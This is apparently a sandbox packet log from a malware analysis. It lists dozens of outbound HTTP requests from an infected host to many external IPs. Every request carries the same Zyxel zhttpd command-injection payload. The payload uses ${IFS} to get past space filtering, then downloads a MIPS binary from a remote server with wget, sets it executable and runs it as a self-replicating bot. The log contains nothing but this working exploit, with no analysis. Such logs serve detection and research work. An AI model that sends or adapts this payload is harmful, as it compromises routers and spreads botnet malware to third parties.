                                              Jan 29, 2024 07:03:57.147686958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6023192.168.2.1457554172.5.227.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.147723913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6024192.168.2.145435877.229.236.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.147758961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6025192.168.2.1434702135.246.62.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.147806883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6026192.168.2.145727432.97.141.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.147844076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6027192.168.2.1457018207.105.244.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.147898912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6028192.168.2.144227280.102.74.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.147929907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6029192.168.2.1458688191.34.174.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.147959948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6030192.168.2.1434592119.143.144.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.147975922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6031192.168.2.1447106192.106.181.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148041964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6032192.168.2.145590819.177.43.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148070097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6033192.168.2.1437852174.215.37.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148118019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6034192.168.2.1447494201.55.188.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148123026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6035192.168.2.1452744120.130.107.108443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148173094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6036192.168.2.145961465.176.153.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148196936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6037192.168.2.14560601.147.146.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148228884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6038192.168.2.1457714154.152.208.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148279905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6039192.168.2.1440542102.229.234.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148324013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6040192.168.2.144599019.66.128.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148339987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6041192.168.2.1451258178.180.200.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148392916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6042192.168.2.1455214194.148.109.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148410082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6043192.168.2.145827644.241.205.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148468971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6044192.168.2.1438586192.39.228.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148484945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6045192.168.2.143413637.88.74.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148525000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6046192.168.2.1445220176.69.83.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148546934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6047192.168.2.144291877.86.229.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148591995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6048192.168.2.145048285.50.202.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148618937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6049192.168.2.146003242.151.23.225443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148657084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6050192.168.2.144369839.181.98.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148689985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6051192.168.2.145796283.189.150.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148729086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6052192.168.2.1436468111.81.232.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148781061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6053192.168.2.14377628.26.197.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148808956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6054192.168.2.144825473.23.16.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148834944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6055192.168.2.1450610178.222.71.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148888111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6056192.168.2.145527850.246.158.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148929119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6057192.168.2.1441258112.69.78.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.148948908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6058192.168.2.145796447.200.13.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.149017096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6059192.168.2.1437366128.119.250.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.149048090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6060192.168.2.1435122103.76.179.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.149101019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6061192.168.2.144993276.225.35.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.149123907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6062192.168.2.145314695.16.83.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.149158001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6063192.168.2.145848239.200.7.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.149202108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6064192.168.2.1459650222.254.48.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.149229050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6065192.168.2.1438722186.248.150.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.149283886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6066192.168.2.145108469.205.136.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.149331093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6067192.168.2.144834878.125.197.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.149364948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6068192.168.2.145073653.111.156.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.149408102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6069192.168.2.1445800110.53.90.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.149461985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6070192.168.2.145026620.135.17.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.149478912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6071192.168.2.1436054173.69.97.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.149524927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6072192.168.2.145416294.97.127.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.149548054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6073192.168.2.1456770102.52.141.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.149590969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6074192.168.2.1439122206.112.76.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.149614096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6075192.168.2.1447356103.171.106.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.149650097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6076192.168.2.1458302190.224.107.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.149674892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6077192.168.2.1438368131.126.239.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.149734974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6078192.168.2.1435176169.250.207.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.149769068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6079192.168.2.143304451.223.220.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.149808884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6080192.168.2.1449402199.156.61.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.149852037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6081192.168.2.1440206125.27.253.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.149910927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6082192.168.2.1451686185.210.77.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.149925947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6083192.168.2.1448814110.184.7.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.149951935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6084192.168.2.1442092106.212.69.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.150007010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6085192.168.2.14602541.249.94.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.150051117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6086192.168.2.1454588221.128.4.75443
                                              TimestampBytes transferredDirectionData
